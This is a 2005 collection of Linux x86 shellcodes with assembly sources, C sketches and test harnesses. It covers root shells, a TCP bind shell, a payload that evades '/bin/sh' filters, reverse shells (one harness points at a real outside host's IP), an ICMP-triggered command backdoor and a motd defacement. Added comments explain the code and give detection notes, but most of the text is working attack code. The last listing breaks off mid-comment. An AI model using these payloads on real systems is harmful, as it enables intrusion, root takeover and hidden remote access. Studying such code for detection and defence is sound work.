
shellcodes.txt
Posted Nov 2, 2005
Authored by unl0ck, choix | Site exploiterz.org

Collection of shellcodes for linux.

tags | shellcode
systems | linux
MD5 | b970513144cd8f7124e8d9a631d3d6c3

//////////////////////////////////////////
///Collection of Linux(x86) shellcodes///
/////////////////////////////////////////
written and modified by ChoiX

-----------------------------------------------------------
1. Execve() shellcodes
----------------------------
a)Simple shellcode
Size:46 byte
Description: Makes setreuid(0,0); execve /bin/sh; exit;
Code:

#include <stdio.h>

/*
 * 1a: i386 Linux payload (int 0x80 ABI).  In order: setreuid(0,0) via
 * syscall 70 (0x46), execve("/bin//sh", ["/bin//sh", NULL], envp) via
 * syscall 11 (0xb), exit() via syscall 1.  The doubled slash pads the path
 * to two 4-byte pushes without a NUL byte, which is also why a plain string
 * match on "/bin/sh" does not see it.
 * NOTE(review): the hex below totals 44 bytes (45 with the terminating NUL),
 * not the 46 stated in the heading.
 */
char
shellcode[]=

// setreuid(0,0);  (syscall 70; succeeds only where the caller may already become root, e.g. a setuid-root process)
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx      ruid = 0
"\x31\xc9" // xor %ecx,%ecx      euid = 0
"\xb0\x46" // mov $0x46,%al      70 = setreuid
"\xcd\x80" // int $0x80

// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax              NUL terminator for the path
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f   "//sh"
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f   "/bin" -> memory reads "/bin//sh"
"\x89\xe3" // mov %esp,%ebx      path
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx   envp = address of the NUL dword pushed above
"\x50" // push %eax              argv[1] = NULL

"\x53" // push %ebx              argv[0] = path
"\x8d\x0c\x24" // lea (%esp,1),%ecx          argv
"\xb0\x0b" // mov $0xb,%al       11 = execve
"\xcd\x80" // int $0x80

// exit();  reached only if execve fails
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al       1 = exit
"\xcd\x80"; // int $0x80

/*
 * Test harness: transfers control into the byte array above.  Two things a
 * reader should know: `(long) funct = &shellcode;` is a cast-as-lvalue, a
 * GCC extension that was removed long ago (not valid C, rejected by current
 * compilers), and the call only works if writable data is also executable —
 * under the NX/W^X data mappings that are the default on current toolchains,
 * `funct();` faults instead of running the payload.
 */
int main(){
void (*funct) ();
(long) funct = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
funct(); /* jump into the .data array; faults under a non-executable data mapping */
}
----------------------------
b)Simple2 shellcode
Size: 32 byte
Description: Simple shellcode which makes setuid(0); execve("/bin/sh",0);
Code:

/*assembler code
__asm__("

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %eax,%eax
cdq
push %eax
pushl $0x68732f6e

pushl $0x69622f2f
mov %esp, %ebx
push %eax
push %ebx
mov %esp,%ecx
movb $0xb, %al
int $0x80

");*/

/*
 * 1b: the same idea packed one syscall per line; the commented-out asm above
 * is the author's source.  The array is named `main`, presumably so that the
 * entry symbol resolves to the data itself and execution starts on the bytes
 * with no harness function — this too needs an executable data mapping.
 */
char main[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0);  syscall 23 (0x17) */

"\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68" /* execve() of /bin/sh: cdq zeroes %edx (envp), push NUL, push "n/sh" */
"\x68\x2f\x2f\x62\x69\x89\xe3\x50" /* push "//bi" -> "//bin/sh"; %ebx = path; push NULL (argv[1]) */
"\x53\x89\xe1\xb0\x0b\xcd\x80"; /* push path (argv[0]); %ecx = argv; syscall 11 = execve */


-----------------------------------------------------------
2. Bind shellcodes
-----------------------------------------------------------
a)Bind shellcode
Size:156 byte
Description: shellcode that binds /bin/sh to port 30464
Code:

/*
 * 2a: bind shell, i386 Linux.  Sequence (the author's comments below):
 * socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) -> bind(fd, 0.0.0.0:30464) ->
 * listen(fd, 1) -> accept(fd, 0, 0) -> dup2(cli, 0/1/2) -> execve("//bin/sh").
 * Every network call goes through socketcall (syscall 102 = 0x66) with the
 * sub-function in %ebx (1 socket, 2 bind, 4 listen, 5 accept).  The 156
 * bytes stated in the heading match the hex below.
 * Detection note: a process with no reason to listen that opens a TCP
 * listener, accepts one connection, dup2()s it onto fds 0-2 and execs a
 * shell is the textbook bind-shell sequence; syscall-sequence monitoring
 * sees it whichever port byte is patched in.
 */
char shellcode[] =
/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x66" // movb $0x66,%al     102 = socketcall
"\xb3\x01" // movb $0x1,%bl      SYS_SOCKET
"\x51" // pushl %ecx             (0)
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx             IPPROTO_TCP
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx             SOCK_STREAM
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx             AF_INET
"\x8d\x0c\x24" // leal (%esp),%ecx   argument array
"\xcd\x80" // int $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"\xb3\x02" // movb $0x2,%bl      SYS_BIND
"\xb1\x02" // movb $0x2,%cl      dead: overwritten by the next instruction
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx             sin_zero / sin_addr = 0 (INADDR_ANY), three dwords
"\x51" // pushl %ecx
"\x51" // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushw %cx          bytes 77 00 -> port 0x7700 = 30464 in network order
"\xb1\x02" // movb $0x2,%cl
"\x66\x51" // pushw %cx          sin_family = AF_INET
"\x8d\x0c\x24" // leal (%esp),%ecx   &sin
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx             sizeof(sin) = 16
"\x51" // pushl %ecx             &sin
"\x50" // pushl %eax             fd
"\x8d\x0c\x24" // leal (%esp),%ecx   argument array
"\x89\xc2" // movl %eax,%edx     keep fd in %edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80

/* listen(fd, 1) */
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx             backlog 1
"\x52" // pushl %edx             fd
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\x80\xc3\x03" // addb $0x3,%bl  1 + 3 = 4 = SYS_LISTEN
"\xcd\x80" // int $0x80

/* cli = accept(fd, 0, 0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx             fd
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb3\x05" // movb $0x5,%bl      SYS_ACCEPT
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 0) */
"\x89\xc3" // movl %eax,%ebx     accepted socket
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al     63 = dup2
"\xcd\x80" // int $0x80

/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx             NUL terminator
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e   "n/sh"
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f   "//bi"
"\x89\xe3" // movl %esp,%ebx     path
"\x8d\x54\x24\x08" // leal 0x8(%esp),%edx   envp = address of the NUL dword
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx             argv[1] = NULL
"\x53" // pushl %ebx             argv[0]
"\x8d\x0c\x24" // leal (%esp),%ecx   argv
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al      11 = execve
"\xcd\x80" // int $0x80

/* exit(%ebx)  reached only if execve fails */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80

/*
 * Harness for the bind shell above.  `(long) funct = &shellcode;` is a
 * cast-as-lvalue (removed GCC extension, not valid C) and the call requires
 * the .data section to be executable; with NX data mappings it faults at
 * `funct();`.
 */
int main(void)
{
void (*funct)();
(long) funct = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
funct(); /* control transfers into writable data */
}
----------------------------
b) "/bin/sh"-filter evading shellcode
Size:51 byte
Description: ???
Code:

/*
 * 2b: setreuid(0,0) + execve("//bin/sh") — 50 bytes by count of the hex
 * below (the heading says 51).  The path never appears in the payload: each
 * 4-byte chunk is stored pre-shifted left by one (0xd0e65edc, 0xd2c45e5e) and
 * restored with shr at run time (-> 0x68732f6e "n/sh", 0x69622f2f "//bi"),
 * which is the "filtering evading" the author refers to.  A content scanner
 * looking for "/bin/sh" in the bytes therefore finds nothing; detection has
 * to be behavioural (the setreuid -> execve syscall pair).
 */
char shellcode[] =
/* setreuid(0,0) 10 */
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x46" // movb $0x46,%al     70 = setreuid
"\xcd\x80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], [NULL]) */
"\x53" // pushl %ebx             NUL terminator for the path

/*
* shifting all "/bin/sh" to left by one, stuff it in %eax,
* then shift it to right by one, evading "/bin/sh" filtering !!!
*/

"\xb8\xdc\x5e\xe6\xd0" // movl $0xd0e65edc,%eax
"\xd1\xe8" // shrl %eax          -> 0x68732f6e "n/sh"
"\x50" // pushl %eax
"\xb8\x5e\x5e\xc4\xd2" // movl $0xd2c45e5e,%eax
"\xd1\xe8" // shrl %eax          -> 0x69622f2f "//bi"
"\x50" // pushl %eax


"\x89\xe3" // movl %esp,%ebx     path
"\x8d\x54\x24\x08" // leal 8(%esp),%edx   envp = address of the NUL dword pushed first
"\x51" // pushl %ecx             argv[1] = NULL (%ecx is still 0)
"\x53" // pushl %ebx             argv[0]
"\x8d\x0c\x24" // leal (%esp),%ecx   argv
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al      11 = execve
"\xcd\x80" // int $0x80

// exit();  reached only if execve fails
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80



/*
 * Harness: same pattern as the other listings — cast-as-lvalue assignment
 * (removed GCC extension, not valid C) followed by a call into the .data
 * array, which needs an executable data mapping to run at all.
 */
int main(void)
{
void (*fptr)();
(long) fptr = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
fptr(); /* control transfers into writable data */
}
-----------------------------------------------------------
4. Connectback shellcodes
-----------------------------------------------------------
a)Simple connectback shellcode
Size:131 byte
Description: shellcode that connects back to port 45295 (0xb0ef)
Code:

#include <stdio.h>

/*
 * 4a: connect-back shell, i386 Linux; c_code() and asm_code() below are the
 * author's readable equivalents of this blob.  Sequence: socket(2,1,6) ->
 * connect(fd, {AF_INET, port 0xb0ef = 45295, addr}) -> exit() if connect
 * failed -> dup2(fd, 0/1/2) -> execve("//bin/sh") -> exit().  The address is
 * the placeholder "ABCD" (\x41\x42\x43\x44, array bytes 33-36); main()
 * overwrites those four bytes with the destination octets before jumping.
 * Detection note: an outbound TCP connection from a process that then has a
 * socket on fds 0-2 and execs a shell is the reverse-shell fingerprint.
 */
char
shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0" /* pushl "ABCD" (bytes 33-36 = address placeholder); pushw ... */
"\xef\xb1\x02\x66\x51\x89\xe7\xb3" /* ... $0xefb0 -> bytes b0 ef = port 0xb0ef network order */
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80" /* je over exit() when connect returned 0 */
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";

/*
 * Author's C sketch of the blob above.  It is pseudo-C, not buildable as
 * written: socket/connect/dup2/execve/exit are used without their headers,
 * exit() is called with no argument, and the 16-byte sockaddr is a bare
 * byte string (the asm builds the same structure on the stack).
 */
int
c_code()
{
char *argv[2];
char *sockaddr = "\x02\x00"// Address family
"\xef\xb0"// port
"\x00\x00\x00\x00"// sin_addr
"\x00\x00\x00\x00"
"\x00\x00\x00\x00";

int sock;

sock = socket(2, 1, 6); /* AF_INET, SOCK_STREAM, IPPROTO_TCP */
if (connect(sock, sockaddr, 16) < 0) exit(); /* exit() without an argument: pseudo-code */

dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);

argv[0] = "//bin/sh";
argv[1] = NULL;

execve(argv[0], &argv[0], NULL);
exit(); /* reached only if execve fails */
}

/*
 * Author's GNU-syntax assembly for the blob above.  The string literal spans
 * many lines, which old GCC tolerated and current compilers reject, so this
 * function documents the blob rather than building; the `#` comments inside
 * the string are assembler comments.  Flow: socketcall/SYS_SOCKET ->
 * socketcall/SYS_CONNECT, je CONNECTED on a zero return else exit ->
 * three dup2 -> execve("//bin/sh") -> exit.
 */
int
asm_code()
{
__asm("# sock = socket(2, 1, 6);
xorl %eax,%eax
xorl%ebx, %ebx
xorl %ecx,%ecx
pushl%ecx
movb$6,%cl# IPPROTO_TCP
pushl%ecx
movb$1,%cl# SOCK_STREAM
pushl%ecx
movb$2,%cl# AF_INET
pushl %ecx
movl %esp,%ecx
movb $1, %bl# SYS_SOCKET
movb $102, %al# SYS_socketcall
int $0x80

# connect(sock, sockaddr, 16)
movl%eax, %edx
xorl %eax,%eax
xorl%ecx,%ecx
pushl%ecx
pushl %ecx
pushl $0x44434241# ip address
pushw$0xefb0# port
movb$0x02,%cl# address family
pushw%cx
movl%esp,%edi
movb$16,%bl# sizeof(sockaddr)
pushl%ebx
pushl %edi
pushl%edx# sock
movl%esp,%ecx
movb $3, %bl # SYS_CONNECT
movb $102, %al# SYS_socketcall
int$0x80
xorl %ecx,%ecx
cmpl%eax,%ecx
je CONNECTED

# exit()
xorl%eax,%eax
movb$1,%al# SYS_exit
int$0x80

CONNECTED:
# dup2(sock, 0);
xorl %eax,%eax
movb $63,%al# SYS_dup2
movl%edx,%ebx# sock
int $0x80

# dup2(sock, 1);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb$1,%cl# stdout
int $0x80

# dup2(sock, 2);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb $2, %cl# stderr
int $0x80

# execve(argv[0], &argv[0], NULL);
xorl %eax,%eax
xorl%edx,%edx
pushl%eax
pushl $0x68732f6e# the string
pushl $0x69622f2f# //bin/sh
movl%esp, %ebx
pushl%eax
pushl%ebx
movl%esp,%ecx
movb$11,%al# SYS_execve
int $0x80

# exit()
xorl %eax, %eax
movb $1, %al # SYS_exit
int $0x80
");
}

/*
 * Harness: overwrites the "ABCD" placeholder at shellcode[33..36] with the
 * destination IPv4 address (one octet per byte, in dotted order) and then
 * jumps into the array.  Same caveats as the other harnesses: the
 * cast-as-lvalue is a removed GCC extension, and the call needs an
 * executable data mapping.
 */
int
main()
{
void (*funct)();

shellcode[33] = 81;/* ip of www.netric.org :) */
shellcode[34] = 17;
shellcode[35] = 46;
shellcode[36] = 156;

(long) funct = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
funct(); /* control transfers into writable data */
return 0;
}
----------------------------
b)forking connectback shellcode
Size:102 bytes
Description: forking shellcode that connects back to port 39321
Code:

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>

/* Spliced into the byte string below by string-literal concatenation: IP as
 * the four dotted octets in order, PORT in network byte order.  Both are the
 * listing's placeholder values (a private 10/8 address). */
#define IP"\x0a\x00\x00\x02"/* 10.0.0.2 */
#define PORT"\x99\x99"/* 39321 */

/*
 * 4b: forking connect-back, i386 Linux; 102 bytes as the heading says.
 * fork(): per the author's asm source the parent, and the child on a failed
 * connect, take the two jne branches to the trailing exit(); the child does
 * socket(2,1,0) -> connect(fd, {AF_INET, PORT, IP}) -> dup2(fd,2), dup2(fd,1)
 * in a countdown loop, then dup2(fd,0) -> execve("/bin//sh").
 * Detection note: the parent exits at once, leaving an orphaned shell whose
 * stdio is a TCP socket — process lineage plus a shell with a socket on
 * fds 0-2 are the host-side signals.
 */
char shellcode[] =
"\x31\xc0"/* xorl %eax,%eax */
"\xb0\x02"/* movb $0x2,%al*/
"\xcd\x80"/* int $0x80 [fork()]*/
"\x31\xdb"/* xorl %ebx,%ebx*/
"\x39\xd8"/* cmpl %ebx,%eax*/
"\x75\x54"/* jne 0x54 — parent (eax = child pid) leaves */

"\x50"/* push %eax          0 = protocol */
"\x40"/* incl %eax*/
"\x50"/* push %eax          1 = SOCK_STREAM */
"\x40"/* incl %eax*/
"\x50"/* push %eax          2 = AF_INET */
"\x89\xe1"/* movl %esp,%ecx*/
"\x43"/* incl %ebx          SYS_SOCKET */
"\xb0\x66"/* movb $0x66,%al*/
"\xcd\x80"/* int $0x80 [socket()]*/

"\x4b"/* decl %ebx*/
"\x53"/* push %ebx          sin_zero / sin_addr padding */
"\x53"/* push %ebx*/
"\x68"IP/* push IP*/
"\x66\x68"PORT/* pushw PORT*/
"\xb3\x02"/* movb $0x2,%bl*/
"\x66\x53"/* pushw %bx        sin_family = AF_INET */
"\x89\xe2"/* movl %esp,%edx   &sockaddr */
"\xb3\x10"/* movb $0x10,%bl*/
"\x53"/* push %ebx          16 */
"\x52"/* push %edx*/
"\x50"/* push %eax          fd */
"\x89\xe1"/* movl %esp,%ecx*/
"\xb3\x03"/* movb $0x3,%bl    SYS_CONNECT */
"\xb0\x66"/* movb $0x66,%al*/
"\xcd\x80"/* int $0x80 [connect()]*/
"\x31\xc9"/* xorl %ecx,%ecx*/
"\x39\xc1"/* cmpl %eax,%ecx*/
"\x75\x23"/* jne 0x23 — connect failed */
"\x58"/* popl %eax          fd back from the argument array */

"\xb1\x02"/* movb $0x2,%cl*/
"\xb0\x3f"/* movb $0x3f,%al   63 = dup2 */
"\xcd\x80"/* int $0x80 [dup2()]*/
"\x49"/* decl %ecx*/
"\x75\xf9"/* jnz -0x7          loop: fds 2 then 1 */
"\xb0\x3f"/* movb $0x3f,%al*/
"\xcd\x80"/* int $0x80 [dup2()]  fd 0 */

"\x50"/* push %eax          NUL terminator */
"\x68\x2f\x2f\x73\x68"/* push '//sh'*/
"\x68\x2f\x62\x69\x6e"/* push '/bin'   -> "/bin//sh" */
"\x89\xe3"/* movl %esp,%ebx*/
"\x50"/* push %eax          argv[1] = NULL */
"\x53"/* push %ebx          argv[0] */
"\x89\xe1"/* movl %esp,%ecx*/
"\x99"/* cdq                %edx = 0 = envp */
"\xb0\x0b"/* movb $0x0b,%al*/
"\xcd\x80"/* int $0x80 [execve()]*/

"\x31\xc0"/* xorl %eax,%eax*/
"\x40"/* incl %eax          1 = exit */
"\xcd\x80";/* int $0x80*/

/*
 * Author's assembly source for the blob above (multi-line string literal,
 * not accepted by current compilers — documentation only).  The `#` texts
 * inside the string are assembler comments; the label name is the author's.
 * NOTE(review): the DUPLOOP dup2 calls pass %ebx as the old fd while %ebx is
 * still 3 from the SYS_CONNECT sub-code, so this appears to rely on the new
 * socket having been assigned descriptor 3 — confirm before reading further.
 */
void asm_code() {
asm ("
xorl %eax,%eax
movb $0x2,%al
int $0x80# [fork]
xorl %ebx,%ebx
cmp %ebx,%eax
jne HOU_OP_MET_DAT_GESODERMIETER

push %eax
incl %eax
push %eax
incl %eax
push %eax
movl %esp,%ecx
incl %ebx
movb $0x66,%al
int $0x80# [socket]

decl %ebx
push %ebx
push %ebx
push $0x0200000a
pushw $0x9999
movb $0x2,%bl
pushw %bx
movl %esp,%edx
movb $0x10,%bl
push %ebx
push %edx
push %eax
movl %esp,%ecx
movb $0x3,%bl
movb $0x66,%al
int $0x80# [connect]

xorl %ecx,%ecx
cmpl %eax,%ecx
jne HOU_OP_MET_DAT_GESODERMIETER

movb $0x2,%cl
DUPLOOP:
movb $0x3f, %al
int $0x80# [dup2]
decl %ecx
jnz DUPLOOP
movb $0x3f, %al
int $0x80# [dup2]

push %eax
push $0x68732f6e
push $0x69622f2f
movl %esp,%ebx
push %eax
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80# [execve]

HOU_OP_MET_DAT_GESODERMIETER:
xorl %eax,%eax
incl %eax
int $0x80# [exit]
");
}

/*
 * Author's C sketch of the forking connect-back.  It is a reference, not a
 * literal transcription of the hex (the two differ in details such as the
 * exact path string and the number of descriptors redirected), and it
 * ignores every return value.
 */
void c_code() {
int fd,i;
char *prog[] = {"/bin/sh",NULL};
char *them = "\x02\x00"
"\x99\x99" /* PORT 0x9999 = 39321 */
"\x0a\x00\x00\x02" /* IP 10.0.0.2 */
"\x00\x00\x00\x00"
"\x00\x00\x00\x00";

if (!fork()) { /* child only; the parent falls through and returns */
fd = socket(2,1,0); /* AF_INET, SOCK_STREAM, default protocol */
connect(fd,(struct sockaddr *)them,16);
for (i = 0; i < 2; i++) dup2(fd,i);
execve(prog[0],prog,NULL);
}
}

/*
 * Harness: prints the array size, then calls into the .data array through a
 * function-pointer cast.  `%d` with a size_t argument is a format mismatch
 * (`%zu` is the matching specifier), and the call needs an executable data
 * mapping — with NX data it faults at `a();`.
 */
int main() {
int (*a)();
a = (int (*)())shellcode; /* data pointer reinterpreted as code */
printf("shellcode size = %d\n\n",sizeof(shellcode)); /* sizeof includes the terminating NUL */
a(); /* control transfers into writable data */
return 0;
}
-----------------------------------------------------------
3. ICMP bind shellcodes
-----------------------------------------------------------
a)Simple icmp bind shellcode
Size: 137 byte
Description: example of using
[/home/choix/codes/shellcodes/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
[/home/choix/codes/shellcodes/icmp]# cat out
uid=0(root) gid=0(root) groups=0(root)
Code:


#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Marker byte the listener looks for in the received ICMP payload (the asm
 * compares 0x99 against the byte before the command text); the ping -p
 * example in the heading places it at the start of the pattern.  Note this
 * is a one-byte string literal, not a char constant. */
#define SECRET_CHAR"\x99"

/*
 * 3a: ICMP command listener, i386 Linux; asm_code()/c_code() below are the
 * author's readable forms.  socket(AF_INET=2, SOCK_RAW=3, IPPROTO_ICMP=1) ->
 * fork(), parent exits -> loop: recvfrom() into the buffer %ebp points at,
 * compare the byte 36 in with SECRET_CHAR (0x99); on a match fork() and in
 * the child close(2) then execve("/bin/sh", ["/bin/sh", "-c", <text after the
 * marker>], NULL).  The trailing "/bin/sh -c" is located at run time by the
 * call at the end of the hex (\xe8\xd8\xff\xff\xff, displacement -0x28, the
 * `call execve` of the asm) and split in place by writing a NUL over the
 * space at offset 7.  Raw ICMP sockets need raw-socket privilege; the
 * transcript in the heading runs it as root.
 * Detection note: a long-lived process holding a raw ICMP socket that forks
 * shells is the host-side signal; on the wire, ICMP echo payloads carrying
 * printable shell commands behind a marker byte are visible to an IDS.
 */
char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02" /* socketcall/SYS_SOCKET, fd -> %edx, then fork */
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89" /* recvfrom args: fd, buf=%ebp, len 0xff, 0, from, &fromlen */
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe" /* NUL-terminate: buf[nb-2] = 0 */

"\xb0\x25\x01\xc5\xb0" SECRET_CHAR /* %ebp += 0x25; compare byte -1 with the marker */
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb" /* fork: child jumps to the call below, parent loops */
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43" /* close(2); pop string address; split "/bin/sh -c" */
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31" /* execve("/bin/sh", [path, "-c", cmd], NULL) */
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff" /* exit; call back into the execve part */
"\xff"
"/bin/sh -c";

/*
 * Author's assembly source for the ICMP listener above (multi-line string
 * literal, not accepted by current compilers — documentation only).  The
 * `/* ... *\/` texts inside the string are assembler comments.  Labels:
 * endlessloop = receive loop, execve = command execution in a forked child,
 * exit, and stack = the call/.string pair that puts the address of
 * "/bin/sh -c" on the stack for `pop %ebx`.
 * NOTE(review): %ebp is used as the receive buffer and is advanced by 0x25
 * every iteration — it is whatever the caller's frame pointer held on entry.
 */
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80/* socket(); */
movl %eax,%edx

movb $0x2,%al
int $0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit

endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80/* recvfrom(); */

movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al/* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop

movb $0x2,%al
int $0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80/* close(); */

pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80/* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80/* exit(); */
stack:
call execve
.string \"/bin/sh -c\"

");
}


/*
 * Author's C sketch of the ICMP listener: raw ICMP socket, daemonise by
 * forking and exiting the parent, then loop forever receiving datagrams and
 * running the text after byte 36 through "/bin/sh -c" when byte 36 is the
 * marker.  Pseudo-C rather than buildable code: exit() and strlen() have no
 * headers, them_size should be socklen_t.
 * NOTE(review): SECRET_CHAR is a string literal, so (char)SECRET_CHAR
 * truncates a pointer instead of yielding 0x99 (the asm compares the byte
 * directly); and recvfrom() returning -1 passes the inner while, after which
 * buf[nb-1] indexes before the array.
 */
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL}; /* command text starts right after the marker byte */

fd = socket(2,3,1); /* AF_INET, SOCK_RAW, IPPROTO_ICMP */
if (fork() > 0) exit(0); /* parent leaves; the child keeps listening */
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0; /* NUL-terminate the received text */
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); } /* stderr closed before the shell runs */
}
}

/*
 * Harness: reports strlen(shell) (stops at the first NUL, so this is the
 * length of the payload text, not sizeof) and calls into the .data array via
 * a function-pointer cast.  `%d` with a size_t argument is a format mismatch
 * and strlen() has no header here; the call needs an executable data mapping.
 */
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell; /* data pointer reinterpreted as code */
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i(); /* control transfers into writable data */
return 0;
}
-----------------------------------------------------------
4. Other shellcodes
-----------------------------------------------------------
a)fun 1 shellcode
Size: 77 byte
Description: shellcode that writes "unl0ck rulez!!!" to /etc/motd
Code:

/*
 * 4a (other): open("/etc////motd", O_WRONLY|O_APPEND = 0x401) -> write(fd,
 * "unl0ck rulez!!!\n", 16) -> exit().  The path is spelled with four slashes
 * so that it fills three 4-byte pushes exactly; path matchers should
 * canonicalise before comparing.  73 bytes by count of the hex below (the
 * heading says 77).
